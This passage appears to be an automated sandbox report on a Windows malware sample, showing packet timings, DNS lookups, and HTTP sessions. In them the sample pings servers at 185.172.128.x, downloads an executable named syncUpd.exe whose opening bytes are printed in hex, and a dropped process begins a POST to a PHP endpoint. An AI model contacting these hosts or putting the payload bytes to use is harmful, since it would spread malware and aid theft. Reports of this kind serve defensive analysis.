                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.179809093 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.179897070 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.179933071 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.180011988 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.180205107 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.180239916 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.180244923 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.180300951 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.180324078 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.180345058 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.180521965 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.180565119 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.180600882 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.180696964 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.180732012 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.180742025 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.180819988 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.180859089 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.180880070 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.181111097 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.181148052 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.181519985 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.182130098 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.182168007 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.182223082 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.182312965 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.182352066 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.182374954 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.182554007 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.182593107 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.182614088 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.182720900 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.182755947 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.182770967 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.182979107 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.183013916 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.185568094 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.185769081 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.185828924 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.185910940 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.186508894 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.186769962 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.188316107 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.188493013 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.188644886 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.188733101 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.188775063 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.188930035 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.189328909 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.189397097 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.189455032 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.189496040 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.189534903 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.189614058 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.189730883 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.190511942 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.190556049 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.190606117 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.190701962 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.193466902 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.193505049 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.193546057 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.193625927 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.193659067 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.193711996 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.193833113 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.193871975 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.193893909 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.193963051 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.194001913 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.194053888 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.194139004 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.194175959 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.194205046 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.194273949 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.194310904 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.194336891 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.194406033 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.194437027 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.194462061 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.194574118 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.194614887 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.194637060 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.194689989 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.194731951 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.194751024 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.194825888 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.194860935 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.194938898 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.194987059 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.195022106 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.195045948 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.195111990 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.195148945 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.195185900 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.195297956 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.195332050 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.195378065 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.195477962 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.195518017 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.195939064 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.196007967 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.196044922 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.196110964 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.196197987 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.196239948 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.196338892 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.196350098 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.196386099 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.196691036 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.196744919 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.196780920 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.196815968 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.196862936 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.196902037 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.196980953 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.197036982 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.197074890 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.197109938 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.197190046 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.197225094 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.197258949 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.197324038 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.197360039 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.197385073 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.197438955 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.197480917 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.197504997 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.197597980 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.197634935 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.197674036 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                            Apr 26, 2024 23:08:57.089993954 CEST192.168.2.41.1.1.10x54eStandard query (0)note.padd.cn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Apr 26, 2024 23:08:59.581481934 CEST192.168.2.41.1.1.10x54eStandard query (0)note.padd.cn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Apr 26, 2024 23:09:13.143759966 CEST192.168.2.41.1.1.10x4dffStandard query (0)svc.iolo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Apr 26, 2024 23:09:27.271101952 CEST192.168.2.41.1.1.10xf818Standard query (0)download.iolo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Apr 26, 2024 23:10:04.849829912 CEST192.168.2.41.1.1.10x51f5Standard query (0)westus2-2.in.applicationinsights.azure.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                            Apr 26, 2024 23:08:58.349827051 CEST1.1.1.1192.168.2.40x54eNo error (0)note.padd.cn.com176.97.76.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Apr 26, 2024 23:08:59.706862926 CEST1.1.1.1192.168.2.40x54eNo error (0)note.padd.cn.com176.97.76.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Apr 26, 2024 23:09:12.988559008 CEST1.1.1.1192.168.2.40x539aNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                            Apr 26, 2024 23:09:12.988559008 CEST1.1.1.1192.168.2.40x539aNo error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Apr 26, 2024 23:09:13.286863089 CEST1.1.1.1192.168.2.40x4dffNo error (0)svc.iolo.com20.157.87.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Apr 26, 2024 23:09:27.400331020 CEST1.1.1.1192.168.2.40xf818No error (0)download.iolo.netiolo0.b-cdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                            Apr 26, 2024 23:09:27.400331020 CEST1.1.1.1192.168.2.40xf818No error (0)iolo0.b-cdn.net195.181.163.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Apr 26, 2024 23:10:04.976326942 CEST1.1.1.1192.168.2.40x51f5No error (0)westus2-2.in.applicationinsights.azure.comwestus2-2.in.ai.monitor.azure.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                            Apr 26, 2024 23:10:04.976326942 CEST1.1.1.1192.168.2.40x51f5No error (0)westus2-2.in.ai.monitor.azure.comwestus2-2.in.ai.privatelink.monitor.azure.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                            Apr 26, 2024 23:10:04.976326942 CEST1.1.1.1192.168.2.40x51f5No error (0)westus2-2.in.ai.privatelink.monitor.azure.comgig-ai-prod-westus2-0.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            0192.168.2.449730185.172.128.90807004C:\Users\user\Desktop\wxfSIz4PAi.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            Apr 26, 2024 23:08:52.240582943 CEST204OUTGET /cpa/ping.php?substr=two&s=ab&sub=0 HTTP/1.1
                                                                                                                                                                                                                            Host: 185.172.128.90
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                                                                                                                                                                                                                            Apr 26, 2024 23:08:53.904736996 CEST148INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Fri, 26 Apr 2024 21:08:52 GMT
                                                                                                                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                            Content-Length: 1
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Data Raw: 30
                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            1192.168.2.449731185.172.128.228807004C:\Users\user\Desktop\wxfSIz4PAi.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            Apr 26, 2024 23:08:54.854088068 CEST190OUTGET /ping.php?substr=two HTTP/1.1
                                                                                                                                                                                                                            Host: 185.172.128.228
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.095015049 CEST147INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Fri, 26 Apr 2024 21:08:54 GMT
                                                                                                                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            2192.168.2.449732185.172.128.59807004C:\Users\user\Desktop\wxfSIz4PAi.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.363866091 CEST181OUTGET /syncUpd.exe HTTP/1.1
                                                                                                                                                                                                                            Host: 185.172.128.59
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.604291916 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Fri, 26 Apr 2024 21:08:55 GMT
                                                                                                                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                            Last-Modified: Fri, 26 Apr 2024 21:00:01 GMT
                                                                                                                                                                                                                            ETag: "4c400-617062ff083e7"
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            Content-Length: 312320
                                                                                                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 0f 14 d4 08 4b 75 ba 5b 4b 75 ba 5b 4b 75 ba 5b 46 27 65 5b 55 75 ba 5b 46 27 5a 5b c3 75 ba 5b 46 27 5b 5b 64 75 ba 5b 42 0d 29 5b 48 75 ba 5b 4b 75 bb 5b 3b 75 ba 5b fe eb 5f 5b 4a 75 ba 5b 46 27 61 5b 4a 75 ba 5b fe eb 64 5b 4a 75 ba 5b 52 69 63 68 4b 75 ba 5b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 26 85 3e 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0c 00 00 1a 01 00 00 82 c2 03 00 00 00 00 e7 40 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 d0 c3 03 00 04 00 00 5d 0c 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$Ku[Ku[Ku[F'e[Uu[F'Z[u[F'[[du[B)[Hu[Ku[;u[_[Ju[F'a[Ju[d[Ju[RichKu[PEL&>e@0@](@iL28@0.text `.rdatam0n@@.data@.rsrci@jD@@.relocL@B [TRUNCATED]
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.604312897 CEST1289INData Raw: 41 00 e8 ef 27 00 00 59 c3 b9 bc 21 02 04 e8 c8 02 00 00 68 8f 28 41 00 e8 d9 27 00 00 59 c3 b9 a8 21 02 04 e8 1f 03 00 00 68 85 28 41 00 e8 c3 27 00 00 59 c3 6a 00 b9 b0 21 02 04 e8 15 01 00 00 c3 6a 00 b9 a4 21 02 04 e8 08 01 00 00 c3 6a 00 b9
                                                                                                                                                                                                                            Data Ascii: A'Y!h(A'Y!h(A'Yj!j!j!j!UQQL$$X]E]UQQQQ$ ]EYY]UVEPUQA^]QAUVEtV
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.604330063 CEST1289INData Raw: 00 53 53 ff 15 34 30 41 00 8d 45 c8 50 ff 15 14 30 41 00 53 53 53 ff 15 30 30 41 00 8d 85 b0 fb ff ff 50 53 ff 15 a4 30 41 00 53 53 ff 15 a0 30 41 00 8d 45 c4 50 53 8d 45 b0 50 53 ff 15 48 30 41 00 53 53 53 53 ff 15 5c 30 41 00 8b 45 f8 8b 0d 98
                                                                                                                                                                                                                            Data Ascii: SS40AEP0ASSS00APS0ASS0AEPSEPSH0ASSSS\0AE!+}uS0AEEE]EEEEEEMEEEEMU3E3U:UGaUNt]MuE~_^[]V5!W=t
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.604347944 CEST1289INData Raw: 55 b8 2b e8 9d 09 f7 65 f0 8b 45 f0 81 6d f4 75 6b 6d 57 b8 65 7f f8 62 f7 65 d0 8b 45 d0 81 6d f0 1a 01 37 1b 81 45 c8 65 b1 36 08 81 45 dc f6 3e 79 75 81 45 d8 02 56 5f 47 81 45 c0 d6 bd 17 3f 81 45 e4 12 5f 9d 36 b8 7b ea 48 5f f7 65 dc 8b 45
                                                                                                                                                                                                                            Data Ascii: U+eEmukmWebeEm7Ee6E>yuEV_GE?E_6{H_eEEMWcm%>mzmmRQ6keEE%v;QeEQKeE)#eEtUeEeED7eEmI'D eEyuSeEoeEm
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.604408026 CEST1289INData Raw: 33 c0 3b c6 5f 1b c0 f7 d8 5e 5d c2 08 00 8b cf e8 31 00 00 00 cc 55 8b ec 83 7d 08 00 57 8b f9 74 1d e8 49 00 00 00 39 45 08 72 13 8b cf e8 3d 00 00 00 03 47 10 3b 45 08 76 04 b0 01 eb 02 32 c0 5f 5d c2 04 00 68 5c 89 41 00 e8 c0 03 00 00 cc 68
                                                                                                                                                                                                                            Data Ascii: 3;_^]1U}WtI9Er=G;Ev2_]h\AhlAU]faayrUQEPN3B;HF]`(AgSVuWe};su'3EOu;vW+
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.604506016 CEST1289INData Raw: e7 03 73 11 f3 0f 7e 0e 83 e9 08 8d 76 08 66 0f d6 0f 8d 7f 08 f7 c6 07 00 00 00 74 63 0f ba e6 03 0f 83 b2 00 00 00 66 0f 6f 4e f4 8d 76 f4 66 0f 6f 5e 10 83 e9 30 66 0f 6f 46 20 66 0f 6f 6e 30 8d 76 30 83 f9 30 66 0f 6f d3 66 0f 3a 0f d9 0c 66
                                                                                                                                                                                                                            Data Ascii: s~vftcfoNvfo^0foF fon0v00fof:ffof:fGfof:fo 0}vfoNvIfo^0foF fon0v00fof:ffof:fGfof:fo 0}vVfoNvfo^0foF fo
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.604651928 CEST1289INData Raw: 0f 7f 7f 70 8d b6 80 00 00 00 8d bf 80 00 00 00 4a 75 a3 85 c9 74 4f 8b d1 c1 ea 04 85 d2 74 17 8d 9b 00 00 00 00 66 0f 6f 06 66 0f 7f 07 8d 76 10 8d 7f 10 4a 75 ef 83 e1 0f 74 2a 8b c1 c1 e9 02 74 0d 8b 16 89 17 8d 76 04 8d 7f 04 49 75 f3 8b c8
                                                                                                                                                                                                                            Data Ascii: pJutOtfofvJut*tvIutFGIuX^_$++QtFGIutvHuYAA1 AAUEu#h#3]@]U
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.604732990 CEST1289INData Raw: 00 54 2e 40 00 4c 2e 40 00 8b 44 8e e4 89 44 8f e4 8b 44 8e e8 89 44 8f e8 8b 44 8e ec 89 44 8f ec 8b 44 8e f0 89 44 8f f0 8b 44 8e f4 89 44 8f f4 8b 44 8e f8 89 44 8f f8 8b 44 8e fc 89 44 8f fc 8d 04 8d 00 00 00 00 03 f0 03 f8 ff 24 95 98 2e 40
                                                                                                                                                                                                                            Data Ascii: T.@L.@DDDDDDDDDDDDDD$.@.@.@.@.@D$^_D$^_FGD$^_IFGFGD$^_t1|9u$r$40@$/@Ir+$8/@$
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.604773045 CEST1289INData Raw: 00 00 59 e8 a1 1a 00 00 c7 00 0c 00 00 00 33 c0 5e 5d c3 cc 8b 4c 24 04 f7 c1 03 00 00 00 74 24 8a 01 83 c1 01 84 c0 74 4e f7 c1 03 00 00 00 75 ef 05 00 00 00 00 8d a4 24 00 00 00 00 8d a4 24 00 00 00 00 8b 01 ba ff fe fe 7e 03 d0 83 f0 ff 33 c2
                                                                                                                                                                                                                            Data Ascii: Y3^]L$t$tNu$$~3tAt2t$ttAL$+AL$+AL$+AL$+W|$n$L$Wtt=u~3tAt#
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.604845047 CEST1289INData Raw: 00 e8 2b 15 00 00 33 c0 eb 7e 33 c0 8b 5d 0c 85 db 0f 95 c0 85 c0 74 de 33 c0 38 03 0f 95 c0 85 c0 74 d3 e8 ac 3a 00 00 8b f0 89 75 08 85 f6 75 0d e8 6a 15 00 00 c7 00 18 00 00 00 eb c8 83 65 fc 00 80 3f 00 75 20 e8 54 15 00 00 c7 00 16 00 00 00
                                                                                                                                                                                                                            Data Ascii: +3~3]t38t:uuje?u TjEPh8A>VuSW;}E)u}VJYUj@uu,]jhAN)3]3}uQ39Et
                                                                                                                                                                                                                            Apr 26, 2024 23:08:55.845791101 CEST1289INData Raw: 75 fc 50 6a ff ff 75 08 6a 00 53 ff 15 54 30 41 00 85 c0 75 19 ff 15 58 30 41 00 50 e8 55 10 00 00 ff 36 e8 c3 10 00 00 83 26 00 59 eb bd 33 c0 40 5e 5b 8b e5 5d c3 55 8b ec 51 8d 45 fc 50 68 b0 40 41 00 6a 00 ff 15 b8 30 41 00 85 c0 74 17 68 c8
                                                                                                                                                                                                                            Data Ascii: uPjujST0AuX0APU6&Y3@^[]UQEPh@Aj0Ath@Auh0Atu]UuYu0AUuEYhjjjMjjj>U=@Ath@AqSYtu@AYNTh1Ah1A


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            3192.168.2.449733185.172.128.76803484C:\Users\user\AppData\Local\Temp\u5ek.0.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            Apr 26, 2024 23:08:57.572292089 CEST417OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
